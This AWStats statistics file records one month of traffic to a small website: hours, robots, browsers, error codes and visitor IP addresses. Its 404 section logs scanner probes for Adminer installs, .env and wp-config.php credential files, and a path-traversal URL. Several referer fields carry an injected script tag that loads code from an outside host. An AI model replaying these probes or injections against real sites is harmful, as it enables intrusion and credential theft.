AWSTATS DATA FILE 6.9 (build 1.925)
# If you remove this file, all statistics for date 202001 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2537                
POS_VISITOR 23380               
POS_DAY 42371               
POS_DOMAIN 3456                
POS_LOGIN 3690                
POS_ROBOT 3845                
POS_WORMS 4561                
POS_EMAILSENDER 4692                
POS_EMAILRECEIVER 4835                
POS_SESSION 43272               
POS_SIDER 43482               
POS_FILETYPES 4970                
POS_OS 5153                
POS_BROWSER 5312                
POS_SCREENSIZE 5752                
POS_UNKNOWNREFERER 5826                
POS_UNKNOWNREFERERBROWSER 6386                
POS_ORIGIN 7015                
POS_SEREFERRALS 7159                
POS_PAGEREFS 7327                
POS_SEARCHWORDS 7719                
POS_KEYWORDS 7871                
POS_MISC 2201                
POS_ERRORS 7930                
POS_CLUSTER 3546                
POS_SIDER_404 8090                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20200201001353 8851 2010411 67855131831
FirstTime 0
LastTime 20200131231856
LastUpdate 20200201021356 8851 8562 288 0 0
TotalVisits 531                 
TotalUnique 427                 
MonthHostsKnown 0                   
MonthHostsUnknown 498                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 48 173 19727640 127 163 1961458
1 22 68 8206451 112 142 596235
2 18 25 2049239 76 100 964712
3 19 22 766140 233 264 4942970
4 25 75 7140992 54 85 1076849
5 20 55 9169137 135 186 1516017
6 23 30 438977 74 100 2913614
7 35 103 7065727 104 148 3463477
8 97 394 38707582 421 478 1346239
9 56 227 27053886 145 167 1942397
10 38 118 10597746 56 75 914974
11 37 109 4458514 75 108 745341
12 50 125 10267854 154 183 2444681
13 82 369 38473869 195 232 2047166
14 122 511 37154507 318 454 1480134
15 53 232 19141279 162 210 1029435
16 58 188 18633455 71 111 522170
17 90 424 43973168 83 132 2850682
18 36 150 17631493 74 105 3798228
19 45 131 6216108 75 105 3046401
20 26 86 7627483 51 68 4573874
21 67 377 39049642 114 149 744300
22 51 189 20150204 72 101 2304669
23 93 491 42499687 134 168 1398152
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 1211 4672 436200780
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 16
googlebot 780 26362630 20200131224758 274
cfnetwork 336 0 20200130231011 0
java 249 3324117 20200127131355 0
spider 240 954598 20200131141339 0
bot[+:,\.\;\/\\-] 235 9309787 20200131234559 51
msnbot 85 5555858 20200131091117 7
yandex 39 283472 20200131011907 17
robot 32 1364584 20200131082948 26
vagabondo 24 440982 20200129224723 4
mail\.ru 19 172277 20200128123003 8
no_user_agent 11 154700 20200123141219 2
mojeekbot 2 23035 20200116202911 1
unknown 17 1162 20200125071443 17
netcraft 2 45904 20200130111451 0
baiduspider 1 22952 20200118012333 0
crawl 7 131665 20200106001722 1
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 178 3496171 0 0
png 665 17651033 0 0
html 1211 14012835 0 0
xml 3 2808 0 0
js 428 180082 0 0
jpg 2181 400855247 0 0
gif 6 2604 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 11
winxp 19
winlong 2
unix 22
win2000 4
winnt 1285
winvista 25
linux 832
macosx 1594
winunknown 1
Unknown 344
win2008 544
END_OS

# Browser ID - Hits
BEGIN_BROWSER 30
firefox71.0 16
msie6.0 2
firefox66.0 1
firefox50.0 60
firefox17.0 15
chrome 2281
firefox3.0.1 1
firefox72.0 136
firefox4.0 3
curl 1
msie5.5 2
firefox24.0 1
firefox63.0 19
firefox31.0 1
msie8.0 1
firefox62.0 5
firefox33.0 1
mozilla 290
netscape5.0 2
firefox59.0 1
msie7.0 3
firefox65.0 1
firefox3.6.3 6
firefox9.0.1 1
wget 1
msie9.0 115
Unknown 318
firefox3.5 1
firefox15.0.1 1
safari 1386
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 9
YahooCacheSystem;_YahooWebServiceClient 20200122003034
/n_software_IPWorks_HTTP/S_Component_-_www.nsoftware.com 20200121131134
GuzzleHttp/6.3.3_curl/7.29.0_PHP/5.6.40 20200121081109
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20200130211951
'' 20200117145745
Go-http-client/1.1 20200130000324
Mozilla/4.0_(compatible;) 20200129060348
Mozilla/5.0_(compatible;_Dataprovider.com) 20200112005321
Mozilla/5.0_(compatible;_ips-agent) 20200109130803
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 8
YahooCacheSystem;_YahooWebServiceClient 20200122003034
/n_software_IPWorks_HTTP/S_Component_-_www.nsoftware.com 20200121131134
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20200130211951
'' 20200117145745
Go-http-client/1.1 20200130000324
Dalvik/2.1.0_(Linux;_U;_Android_9;_SM-G950U_Build/PPR1.180610.011) 20200126204248
Dalvik/2.1.0_(Linux;_U;_Android_10;_SM-N970U1_Build/QP1A.190711.020) 20200125174620
GoogleEarth/7.1.8.3036(Windows;Microsoft_Windows_(6.2.9200.0);en;kml:2.2;client:Pro;type:default) 20200119171001
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 474 549
From1 0 0
From2 69 198
From3 17 24
From4 651 3901
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
google 67 192
yahoo 2 6
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 7
http://www.sushiwabihouston.com 8 8
http://www.hrmag.org 6 6
http://webhelper.centurylink.com/search/ 1 1
http://www.lakewoodpres.org 1 1
http://www.tristalindsay.top/blog/19911583/profile/ 1 1
https://www.bing.com 0 3
https://www.bing.com 0 4
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 7
302 227 53064
206 11 229520
409 1 83
406 2 548
407 1 415
404 967 8658
301 746 184164
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 480
/adminer-3.6.3-mysql-en.php 1 -
//https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 12 -
//assets/plugins/jquery-file-upload/server/php/ 1 -
/wp-content/plugins/delucks-seo/modules/professional/breadcrumbs/assets/css/frontend.css 1 -
/adminer-3.7.0.php 1 -
/adminer-3.2.2.php 1 -
/adminer-3.0.1-cs.php 1 -
/adminer-3.2.1-cs.php 1 -
//cdn2.editmysite.com/js/old/slideshow-jq.js 12 -
/vendor/phpunit/phpunit/LICENSE 1 -
/adminer-4.2.0-mysql-en.php 1 -
/adminer-4.0.2-cs.php 1 -
/web//gallerypro/index.html 2 -
/adminer-3.5.0-mysql-cs.php 1 -
/staging/rss/order/new 1 -
/adminer-3.1.0-mysql.php 1 -
/dev/rss/catalog/notifystock 1 -
/adminer-4.0.0-mysql-cs.php 1 -
/id3.html 3 -
/phpmyadmin/print.css 2 -
/adminer-4.3.0-mysql-cs.php 1 -
/adminer-4.2.1-cs.php 1 -
/adminer-3.6.4-mysql.php 1 -
/xmlrpc.php 2 -
/magento/downloader/index.php 1 -
/adminer-4.2.2-mysql-en.php 1 -
/phpMyAdmin/print.css 2 -
/tim.php 1 -
/adminer-4.7.2-mysql-cs.php 1 -
/adminer-3.3.4-mysql-en.php 1 -
/web.config.txt 1 -
/adminer-3.4.0-cs.php 1 -
/th1s_1s_a_4o4.html 31 -
/adminer-4.7.3-cs.php 1 -
/adminer-4.2.3-en.php 1 -
/adminer-4.2.3-mysql.php 1 -
/adminer-4.6.1.php 1 -
/adminer-3.3.0-mysql.php 1 -
/adminer-3.3.0-en.php 1 -
///////https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 11 -
//wp-login.php 7 \"><script%20type=text/javascript%20src='https://statistic.admarketlocation.com/hos
/demo/rss/order/new 1 -
/adminer-4.7.3-mysql-en.php 1 -
/adminer-3.3.2-mysql-cs.php 1 -
/adminer-4.6.3-cs.php 1 -
/adminer-4.6.0-cs.php 1 -
/adminer-4.0.2-mysql.php 1 -
/adminer-4.0.0-mysql.php 1 -
////////https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 11 -
/adminer-4.7.0-mysql-cs.php 1 -
/adminer-4.3.1-mysql.php 1 -
/adminer-4.2.4-mysql.php 1 -
/adminer-3.3.1-mysql-cs.php 1 -
/adminer-3.2.1-mysql-en.php 1 -
/program_files/login.php 1 -
/adminer-3.6.4-mysql-en.php 1 -
/adminer-3.2.2-en.php 1 -
/adminer-4.0.3-en.php 1 -
/adminer-4.2.0-mysql-cs.php 1 -
/adminer-3.3.2-en.php 1 -
/adminer-3.1.0-en.php 1 -
/wp-content/plugins/wp-inventory-manager/themes/css/default-theme.css 1 -
/adminer-3.7.0-mysql-en.php 1 -
/wp-login.php 6 -
/adminer-3.2.2-mysql-en.php 1 -
/adminer-3.3.1-cs.php 1 -
/wp-content/plugins/wp-private-content-plus/css/wppcp-front.css 1 -
/adminer-4.1.0-mysql-cs.php 1 -
/adminer-3.6.3-mysql-cs.php 1 -
/adminer-3.6.1-cs.php 1 -
/store/ 1 -
/demo/rss/catalog/review 1 -
/adminer-3.6.0.php 1 -
/demo/index.php/admin/ 1 -
/adminer-4.7.2-mysql.php 1 -
/adminer-4.6.0-mysql-en.php 1 -
/adminer-4.0.0-en.php 1 -
/old/rss/catalog/notifystock 1 -
//cdn2.editmysite.com/css/old/slideshow/slideshow.css 1 -
/adminer-3.6.0-mysql-cs.php 1 -
/test/index.php/admin/ 1 -
/ad.php 1 -
/adminer-3.3.0.php 1 -
/https://cpw.state.co.us 12 -
/old/index.php/admin/ 1 -
/shop/ 1 -
/old/downloader/index.php 1 -
/magento/rss/order/new 1 -
/wp-admin 1 \"><script%20type=text/javascript%20src='https://statistic.admarketlocation.com/hos
/adminer-3.5.0-cs.php 1 -
/downloader/index.php 9 -
/adminer-4.7.1-mysql-cs.php 1 -
/adminer-3.4.0.php 1 -
/adminer-3.3.1.php 1 -
/license.txt 3 -
/adminer-4.2.0.php 1 -
/adminer-3.3.2-mysql.php 1 -
/adminer-4.6.0-en.php 1 -
/adminer-4.4.0-cs.php 1 -
/adminer-3.3.1-en.php 1 -
/adminer-4.6.3-en.php 1 -
/ads.txt 128 -
/adminer-4.1.0.php 1 -
/shop/errors/503.php 1 -
/test/downloader/index.php 1 -
/adminer-4.2.2-cs.php 1 -
/adminer-3.7.0-cs.php 1 -
/adminer-4.7.0-cs.php 1 -
/wp-content/plugins/yuzo-related-post/assets/js/admin.js 1 -
/adminer-4.2.5-en.php 1 -
/adminer-4.5.0.php 1 -
/adminer-4.2.4-mysql-en.php 1 -
/cgi//gallerypro/index.html 2 -
/adminer-4.4.0-mysql.php 1 -
/adminer-4.2.1-mysql.php 1 -
/adminer-4.2.1-mysql-cs.php 1 -
/adminer-3.0.1-mysql.php 1 -
/adminer-4.6.0-mysql-cs.php 1 -
/adminer-4.2.1.php 1 -
/adminer-3.0.1.php 1 -
/adminer-4.4.0-en.php 1 -
/adminer-4.2.0-en.php 1 -
/dev/rss/order/new 1 -
/adminer-4.2.4-en.php 1 -
/adminer-3.4.0-mysql-cs.php 1 -
/adm.php 1 -
//////https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 12 -
/adminer-4.2.4.php 1 -
/adminer-4.3.0-mysql-en.php 1 -
/gallery//diarypro/index.html 2 -
/adminer-3.7.1-mysql-cs.php 1 -
/adminer-3.6.2-cs.php 1 -
/adminer-4.0.1-mysql-cs.php 1 -
/index.html/mobi/ 1 -
/adminer-4.7.1.php 1 -
/adminer-3.0.1-mysql-en.php 1 -
/store/downloader/index.php 1 -
/adminer-3.5.0-mysql-en.php 1 -
/_skin//diarypro/index.html 2 -
/mail/ 1 -
/adminer-4.5.0-cs.php 1 -
/adminer-4.2.0-mysql.php 1 -
/wp-content/uploads/file-manager/log.txt 1 -
/adminer-3.2.1-mysql.php 1 -
/adminer-3.3.3-cs.php 1 -
/test/rss/catalog/review 1 -
/wp-admin/admin-post.php 21 -
/wp-content/plugins/wpshopify/dist/public.min.css 1 -
/adminer-3.6.3-en.php 1 -
/adminer-3.3.0-mysql-cs.php 1 -
/adminer-3.1.0-cs.php 1 -
//cdn2.editmysite.com/fonts/Aller/font.css 1 -
/magento/rss/catalog/notifystock 1 -
/diary//gallerypro/index.html 2 -
/feed/ 2 -
/adminer-3.3.4-mysql-cs.php 1 -
/adminer-3.6.1-mysql.php 1 -
/media/system/js/core.js 3 -
/adminer-4.7.1-cs.php 1 -
/adminer-3.6.2-en.php 1 -
/vpn/../vpns/cfg/smb.conf 5 https://www.continentalranchatcreede.com/vpn/../vpns/cfg/smb.conf
/adminer-4.0.1.php 1 -
/adminer-4.7.0-mysql.php 1 -
/adminer-3.7.1-mysql-en.php 1 -
/adminer-3.5.1.php 1 -
/index.php/admin/ 9 -
/adminer-3.3.4-en.php 1 -
/staging/downloader/index.php 1 -
/adminer-4.3.0.php 1 -
/adminer-3.3.3-mysql-en.php 1 -
//cdn2.editmysite.com/css/old/fancybox.css 1 -
/adminer-3.0.0-mysql.php 1 -
/adminer-3.3.2.php 1 -
/adminer-4.6.1-en.php 1 -
/magento/errors/503.php 1 -
/adminer-3.6.4-mysql-cs.php 1 -
/magento/index.php/admin/ 1 -
/adminer-3.7.0-mysql.php 1 -
/id5.html&sa=U&ved=2ahUKEwi9qaam0IPnAhWmxoUKHSqjBsUQFjAIegQIHxAB&usg=AOvVaw3v8eIVim-WkyCR5Sdmx1Lc\" 1 -
/test/rss/catalog/notifystock 1 -
/wp-content/plugins/fb-messenger-live-chat/assets/js/main.js 1 -
/adminer-4.2.4-mysql-cs.php 1 -
/adminer-3.3.1-mysql-en.php 1 -
/adminer-3.6.1-en.php 1 -
/adminer-3.6.2-mysql-cs.php 1 -
/adminer-4.7.1-mysql-en.php 1 -
/adminer-3.6.2.php 1 -
/cgi-bin//gallerypro/index.html 2 -
/wp-content/plugins/easy2map/scripts/jquery.xml2json.js 1 -
/lib//diarypro/index.html 2 -
/adminer-3.5.0-en.php 1 -
/cgi-bin//mt-static/TinyMCEforMT/file_manager.php 2 -
/adminer-3.7.1-cs.php 1 -
/adminer-3.2.1-en.php 1 -
/adminer-4.6.1-mysql.php 1 -
//cdn2.editmysite.com/js/lang/en/stl.js 12 -
/store/rss/order/new 1 -
/adminer-4.2.5-mysql-en.php 1 -
/store/errors/503.php 1 -
/admin/ 5 -
/shop/pub/errors/503.php 1 -
/adminer-3.6.3-cs.php 1 -
/id1.html 2 -
/shop/rss/order/new 1 -
/////https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 12 -
/adminer-4.3.0-mysql.php 1 -
/wp-content/plugins/adminer/inc/editor/index.php 1 -
/adminer-4.5.0-en.php 1 -
/adminer-3.3.4-cs.php 1 -
/dadabik/program_files/login.php 1 -
/shop/admin/ 1 -
/store/rss/catalog/review 1 -
/wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js 1 -
/adminer-4.0.3-mysql-en.php 1 -
/adminer-3.6.0-en.php 1 -
/adminer-4.6.3-mysql-en.php 1 -
/adminer-3.2.2-mysql.php 1 -
/adminer-3.4.0-mysql-en.php 1 -
/adminer-4.3.1-mysql-en.php 1 -
/adminer-4.2.2-mysql-cs.php 1 -
/adminer-3.0.0-mysql-en.php 1 -
/blog/ 1 -
/wp-config.php~ 1 -
/dev/downloader/index.php 1 -
/adminer-3.6.1-mysql-en.php 1 -
/gallerypro//diarypro/index.html 2 -
/wp-content/plugins/ithemes-sync/js/settings-page.js 1 -
/adminer-4.0.0-cs.php 1 -
/adminer-4.0.3.php 1 -
/adminer-3.0.1-mysql-cs.php 1 -
/adminer-3.2.2-cs.php 1 -
/adminer-4.0.0-mysql-en.php 1 -
/adminer-4.2.1-en.php 1 -
/adminer-3.0.0-en.php 1 -
//cdn2.editmysite.com/fonts/Folks_Light/font.css 1 -
/wp-content/plugins/smart-google-code-inserter/screenshot1.jpg 1 -
/wp-content/plugins/wpematico/app/js/wpe_hooks.js 1 -
/dev/index.php/admin/ 1 -
/adminer-3.0.1-en.php 1 -
/installer.php 1 -
/adminer-3.2.0-mysql.php 1 -
/adminer-4.7.3.php 1 -
/old/errors/503.php 1 -
/adminer-3.6.4-en.php 1 -
/myadmin/print.css 2 -
/core/CHANGELOG.txt 3 -
/js/kcfinder/browse.php 1 -
/adminer-4.7.2-mysql-en.php 1 -
/shop/rss/catalog/notifystock 1 -
/index.html/mobile 1 -
//mt-static/TinyMCEforMT/file_manager.php 2 -
/mysql.php 1 -
/adminer-3.1.0.php 1 -
/wp-content/plugins/hybrid-composer/style.css 1 -
/adminer-4.2.4-cs.php 1 -
/adminer-4.0.3-mysql-cs.php 1 -
/adminer-4.7.0-en.php 1 -
/adminer-3.2.0-mysql-cs.php 1 -
/adminer-3.3.1-mysql.php 1 -
/adminer-4.5.0-mysql.php 1 -
/magento/pub/errors/503.php 1 -
/adminer-3.7.0-en.php 1 -
/shop/index.php/admin/ 1 -
/wp-content/plugins/visualizer/js/media.js 1 -
/adminer-4.3.0-en.php 1 -
/adminer-4.7.1-en.php 1 -
/pma.php 1 -
/magento/ 1 -
/adminer-3.6.3-mysql.php 1 -
/adminer-3.6.0-mysql.php 1 -
//gallerypro/index.html 2 -
/adminer-3.7.1.php 1 -
/adminer-4.6.2.php 1 -
/adminer-4.2.0-cs.php 1 -
/old/rss/catalog/review 1 -
/admin//assets/plugins/jquery-file-upload/server/php/ 1 -
/admin//mt-static/TinyMCEforMT/file_manager.php 2 -
//fonts.googleapis.com/css 2 -
/adminer-4.6.1-mysql-cs.php 1 -
/adminer-4.7.3-en.php 1 -
/adminer-3.3.3-mysql-cs.php 1 -
/adminer-4.7.2-cs.php 1 -
/test/errors/503.php 1 -
/adminer-3.3.2-mysql-en.php 1 -
/adminer-4.0.1-cs.php 1 -
/adminer-4.6.0-mysql.php 1 -
/adminer-4.6.0.php 1 -
/adminer-4.3.0-cs.php 1 -
/demo/rss/catalog/notifystock 1 -
/adminer-3.1.0-mysql-cs.php 1 -
/privacy 12 -
/adminer-4.0.3-cs.php 1 -
/adminer-4.0.3-mysql.php 1 -
/dev/rss/catalog/review 1 -
/adminer-4.2.3-mysql-en.php 1 -
/gallery//gallerypro/index.html 2 -
/_adminer 1 -
//tinymce/plugins/imgsurfer/main.php 1 -
/adminer-3.3.4-mysql.php 1 -
/plugins//ckeditor/kcfinder/browse.php 1 -
/adminer-4.5.0-mysql-en.php 1 -
/index.html/sitemap.html 3 -
/magento/admin/ 1 -
/adminer-4.2.5-mysql.php 1 -
/staging/rss/catalog/review 1 -
/adminer-3.2.0-en.php 1 -
/adminer-4.6.1-cs.php 1 -
/adminer-3.5.0-mysql.php 1 -
/adminer-3.5.1-mysql-cs.php 1 -
/adminer-4.2.5-mysql-cs.php 1 -
/wp-content/adminer.php 1 -
/adminer-3.6.2-mysql-en.php 1 -
/adminer-3.0.0-cs.php 1 -
/adminer-4.7.0-mysql-en.php 1 -
/adminer-4.3.1-en.php 1 -
///www.weebly.com/uploads/reseller/assets/1001-favicon.ico 5 -
/__media__/js/netsoltrademark.php 1 -
/adminer-3.2.2-mysql-cs.php 1 -
/README.txt 3 -
/adminer 1 -
/database/print.css 2 -
/adminer-4.1.0-mysql-en.php 1 -
/adminer-3.6.3.php 1 -
/adminer-3.7.1-en.php 1 -
/wp-admin/admin-ajax.php 16 -
/magento2/ 1 -
/data//diarypro/index.html 2 -
/adminer-4.5.0-mysql-cs.php 1 -
/store/pub/errors/503.php 1 -
/admin//ckeditor/kcfinder/browse.php 1 -
/_adminer.php 1 -
/cms/login.php 1 -
/adminer-3.4.0-mysql.php 1 -
/db.php 1 -
/adminer-3.6.4-cs.php 1 -
/adminer-3.3.0-mysql-en.php 1 -
/adminer-4.0.1-mysql-en.php 1 -
/rss/catalog/review 9 -
/searchreplacedb2.php 1 -
/wp-json/wpshopify/v1/settings 2 -
/adminer-3.6.2-mysql.php 1 -
/store/admin/ 1 -
/a.php 1 -
/adminer-3.6.1.php 1 -
///https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 12 -
/test/rss/order/new 1 -
/index.htmlrobots.txt 8 -
/adminer-4.7.0.php 1 -
/_cgi//diarypro/index.html 2 -
/adminer-3.2.0-cs.php 1 -
/adminer-4.6.1-mysql-en.php 1 -
/magento/rss/catalog/review 1 -
/adminer-3.2.1-mysql-cs.php 1 -
/adminer-4.7.3-mysql.php 1 -
/wp.php 1 -
/adminer-3.6.4.php 1 -
/adminer-4.6.3-mysql.php 1 -
/shop/rss/catalog/review 1 -
/installer-backup.php 1 -
/adminer-4.0.0.php 1 -
/adminer-4.7.2.php 1 -
/adminer-3.0.0.php 1 -
/adminer-4.7.1-mysql.php 1 -
/adminer-3.6.0-cs.php 1 -
/adminer-4.1.0-en.php 1 -
/adminer-4.2.5.php 1 -
/dev/errors/503.php 1 -
/adminer-3.3.3-en.php 1 -
/adminer-4.2.2.php 1 -
/timthumb.php 1 -
//wp-admin/install.php 2 -
/wp-content/plugins/simple-fields/js/chosen/chosen.css 1 -
/adminer-3.6.1-mysql-cs.php 1 -
/adminer-4.2.3-mysql-cs.php 1 -
/adminer-3.7.1-mysql.php 1 -
/adminer-4.3.1-mysql-cs.php 1 -
/assets//ckeditor/kcfinder/browse.php 1 -
/admin/login.php 1 -
/adminer-3.3.0-cs.php 1 -
/dup-installer/main.installer.php 1 -
/adminer-4.6.2-cs.php 1 -
/store/rss/catalog/notifystock 1 -
/adminer-4.0.1-en.php 1 -
/wp-admin/wp-login.php 7 \"><script%20type=text/javascript%20src='https://statistic.admarketlocation.com/hos
/adminer-4.0.2-en.php 1 -
/store/index.php/admin/ 1 -
/adminer-4.2.1-mysql-en.php 1 -
/adminer.php 1 -
/staging/errors/503.php 1 -
/adminer-4.4.0-mysql-cs.php 1 -
/demo/downloader/index.php 1 -
/adminer-4.3.1-cs.php 1 -
/adminer-4.7.3-mysql-cs.php 1 -
/adminer-3.5.1-cs.php 1 -
/pma/print.css 2 -
/cgi//mt-static/TinyMCEforMT/file_manager.php 2 -
/data//gallerypro/index.html 2 -
/wp-content/uploads/adminer.php 1 -
/id2.html 5 -
/admin//tinymce/plugins/imgsurfer/main.php 1 -
/adminer-3.3.3.php 1 -
/plugins//assets/plugins/jquery-file-upload/server/php/ 1 -
/adminer-4.0.2-mysql-cs.php 1 -
/mt//mt-static/TinyMCEforMT/file_manager.php 2 -
/adminer-3.2.0.php 1 -
/shop//gallerypro/index.html 2 -
/adminer-3.2.1.php 1 -
/blog/wp-login.php 1 -
//cdn2.editmysite.com/css/sites.css 3 -
/adminer-3.6.0-mysql-en.php 1 -
/ckfinder/ckfinder.html 1 -
/dadabik/login.php 1 -
/wp-content/plugins/fv-wordpress-flowplayer/css/flowplayer.css 1 -
/rss/catalog/notifystock 9 -
/old/rss/order/new 1 -
/forums 1 -
/wp-config.php 1 -
/adminer-4.4.0.php 1 -
/https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 12 -
/rss/order/new 9 -
/adminer-3.5.1-en.php 1 -
/staging/index.php/admin/ 1 -
/wp-content/plugins/insert-php/admin/assets/js/tag-it.js 1 -
/replace.php 1 -
/adminer-4.3.1.php 1 -
/adminer-3.7.0-mysql-cs.php 1 -
/adminer-4.0.1-mysql.php 1 -
/adminer-4.6.3-mysql-cs.php 1 -
/adminer-4.0.2-mysql-en.php 1 -
/adminer-4.2.5-cs.php 1 -
/adminer-4.6.3.php 1 -
/errors/503.php 9 -
/adminer-4.2.2-mysql.php 1 -
/diary//diarypro/index.html 2 -
/wp-content/plugins/easy-wp-smtp/js/script.js 1 -
////https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js 12 -
/adminer-4.2.2-en.php 1 -
/wp-content/plugins/wp-live-chat-software-for-wordpress/plugin_files/js/livechat.js 1 -
/adminer-4.1.0-cs.php 1 -
/magento2/pub/errors/503.php 1 -
/.env 1 -
/connect.php 1 -
/magento2/admin/ 1 -
/demo/errors/503.php 1 -
/adminer-4.0.2.php 1 -
//cdn2.editmysite.com/js/site/main-mobile.js 12 -
/wp-content/plugins/responsive-coming-soon/templates/template1/assets/css/style.css 1 -
/adminer-3.3.3-mysql.php 1 -
/wp-content/plugins/rich-reviews/css/rich-reviews.css 1 -
/adminer-4.6.2-mysql-en.php 1 -
/pub/errors/503.php 5 -
//cdn2.editmysite.com/js/site/main-customer-accounts-site.js 12 -
/adminer-4.7.2-en.php 1 -
/adminer-4.1.0-mysql.php 1 -
/assets//tinymce/plugins/imgsurfer/main.php 1 -
/adminer-4.6.2-en.php 1 -
/CHANGELOG.txt 3 -
/adminer-3.2.0-mysql-en.php 1 -
/mysql/print.css 2 -
/user/register/ 3 -
/adminer-4.2.3.php 1 -
/adminer-4.2.3-cs.php 1 -
/adminer-3.5.0.php 1 -
/adminer-3.3.4.php 1 -
/adminer-3.5.1-mysql.php 1 -
//ckeditor/kcfinder/browse.php 1 -
/adminer-3.4.0-en.php 1 -
/adminer-4.6.2-mysql-cs.php 1 -
/adminer-4.6.2-mysql.php 1 -
/staging/rss/catalog/notifystock 1 -
/adminer-3.0.0-mysql-cs.php 1 -
/adminer-3.5.1-mysql-en.php 1 -
/adminer-4.4.0-mysql-en.php 1 -
/wp-admin/setup-config.php 1 -
/index.php 1 -
/adminer-3.3.2-cs.php 1 -
/shop/downloader/index.php 1 -
/adminer-3.1.0-mysql-en.php 1 -
/index.html/m/ 1 -
/id4.html 2 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 498
54.208.100.253 24 146 13283480 20200114231534
50.16.241.114 24 138 12861204 20200117145717
107.77.97.111 24 150 19357934 20200102221008
74.37.67.209 23 75 5405892 20200131231856
167.161.101.230 21 137 16426957 20200120172659
97.107.69.86 20 92 9918862 20200129092502
66.228.252.219 19 95 11275288 20200131143623
67.217.11.94 18 95 10285674 20200122085249
166.137.126.98 16 69 8764962 20200118233241
174.24.22.81 15 119 12561109 20200110231706
71.218.69.25 8 55 5855895 20200107134931
172.245.113.149 5 10 1250407 20200125180514
159.138.157.11 1 1 12199 20200129091616
199.244.88.124 3 3 68856 20200115074302
208.184.161.144 1 1 13897 20200120205320
159.138.155.17 1 1 21355 20200119170113
113.70.181.113 1 1 22952 20200121131134
216.176.162.14 1 1 12026 20200127224740
54.185.141.74 1 1 22952 20200122120846
172.58.59.185 2 4 235878 20200108052514
114.119.139.99 1 1 21072 20200107165558
54.70.21.213 1 1 22952 20200130074010
12.31.153.138 10 10 120260 20200130143359
52.32.212.191 1 1 22952 20200104054703
35.237.81.99 1 1 22952 20200130024653
109.169.205.229 1 1 22952 20200124195633
73.26.174.121 0 1 357100 
174.236.2.58 1 1 12026 20200129044844
172.58.59.135 1 1 348 20200112133116
114.119.161.215 1 1 13640 20200109054630
142.93.71.51 6 8 144178 20200109131910
174.236.0.93 1 1 12026 20200126075333
159.138.158.240 0 1 1192 
114.119.158.82 0 1 349607 
107.77.100.80 5 35 2345288 20200123083708
172.58.139.242 1 2 56082 20200125174620
34.240.171.189 6 6 131582 20200106084256
128.248.111.122 0 1 303740 
159.138.157.183 1 1 13640 20200126215022
159.138.156.37 1 1 13640 20200107064158
